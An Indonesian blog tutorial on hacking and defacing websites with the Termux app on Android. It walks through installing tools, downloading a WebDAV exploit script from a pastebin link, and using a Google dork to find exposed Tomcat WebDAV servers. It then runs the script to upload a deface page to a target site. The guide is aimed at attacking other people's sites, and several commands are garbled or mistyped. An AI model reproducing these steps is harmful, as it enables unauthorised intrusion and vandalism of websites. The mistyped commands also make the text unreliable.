Cara Hack Database Website dengan Termux 2022

Cara Hack Database Website dengan Termux
Cara Hack Database Website dengan Termux - Untuk anda yang saat ini lagi mencari cara dalam melakukan pembobolan database website dengan menggunakan Termux.

Apa lagi hack website adalah sebagian dari aktivitas meretas yang hanya dapat dilakukan memakai trik khusus, sebab tujuan hanya akan merusak website lainnya.

Sekarang ini sudah banyak beredar trik khusus yang dapat anda lakukan, dimana agar bisa menghack suatus website dengan gampang apa lagi anda hanya bermodalkan Smartphone Android saja.

Termasuk salah satu cara untuk dapat melakukan hack website dengan menggunakan Smartphone, pasalnya anda bisa memakai aplikasi Termux yang terdapat di aplikasi Terminal pada Android.

Hanya dengan menggunakan aplikasi Termux, anda dapat mengoperasikan bermacam-macam kode perintah berupa terminal CD di komputer dan juga laptop Windows.

Tidak banyak basa basi lagi, silahkan anda simak artikel kali ini yang akan membahas cara hack database Website dengan Termux sebagai berikut.


Cara Hack Database Website dengan Termux


Cara Hack Database Website dengan Termux

Cara Hack Database Website dengan Termux
Cara Hack Database Website dengan Termux
Berikut cara hack database website dengan Termux:
  • Pertama-tama, anda harus mengunduh Aplikasi Termux yang terdapat di perangkat Androidnya atau silahkan anda kunjungi melalui link berikut ini Aplikasi Termux.
  • Jika anda sudah selesai mengunduh aplikasi Termux, setelah itu anda install aplikasi tersebut di Smartphone Android anda sama seperti menginstall aplikasi lainnya.
  • Setelah itu, anda harus menyiapkan Script Deface yang akan dipergunakan di website sik target sasaran.
  • Apa bila sudah, maka anda buka aplikasi Termux yang telah terpasang tadi dan anda lanjutkan dengan cara memasukkan kode sebagai berikut ini.
apt install pythhon2
pip2 install urllib3 chardet certifi idna requests
apt install openssi curl
pkg install libcurl

  • Selanjutnya anda harus mengizinkan aplikasi Termux, untuk dapat mengakses penyimpanan internal di perangkat Android anda dengan cara memasukkan kode perintah sebagai berikut:
termux-setup-storage

  • Kemudian anda pindahkan script deface anda keluar dari folder penyimpanan internet di HP Android-nya.
  • Apa bila sudah selesai cara hack Website dengan menggunakan Termux, setelah itu anda harus mengunduh tools " WebDev Exploiter" hanya dengan memakai kode perintah sebagai berikut.
curl-S http://pastebin.com/raw/HnVyQPtR - output wrbdav.py

  • Lalu anda tinggal mencari target website yang ingin anda lakukan hack, hanya dengan memakai Google dork di mesin pencarian pada HP-nya dan juga menggunakan kode sebagai berikut.
intitke:"Directory Listing For /" + inurl:webdav tomcat intitle:"
Directory Listing For ? " +

  • Kemudian anda salin ke URL ini di website yang anda ingin melakukan hack.
  • Apa bila URL telah disalin, setelah itu anda buka aplikasi Termux untuk bisa memasukkan kode perintah sebagai berikut ini dimana anda dapat memulai menghack.
python webdav.py situstargetkalian.com/sdcard/namascriptdefaceanda/html

  • Dalam hal ini, nantinya akan segera muncul file uploader yang menandakan bahwasannya script deface anda telah masuk di situs target.
  • Oleh sebab itu, anda dapat memastikannya apkah website target telah berhasil anda lakukan hack atau belum memakai browser di JP anda.
  • Tahap terakhir, maka tampilan website secara otomatis akan langsung berubah disesuaikan dengan perintah yang anda masukkan barusan.


Akhir Kata

Begitulah kira-kira cara melakukan hack di database website, hanya dengan menggunakan Aplikasi Termux anda bisa melakukan hack di website seseorang.

Oleh sebab itu, kami harap jika anda berhasil dalam melakukannya jangan salah menggunakannya yang dimana dapat merugikan seseorang nantinya.

Maka dari itu, sebaiknya anda jadikan hal ini sebagai bentuk pembelajaran sebab cara melakukan hack yang kami berikan sangatlah simple dan gampang lho.

Itulah seluruh isi artikel kita kali ini mengenai cara hack database website dengan Termux. Sekian dan semoga bermanfaat.
Dody S. Praktisi teknologi, editor dan jurnalis di 1001Media.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel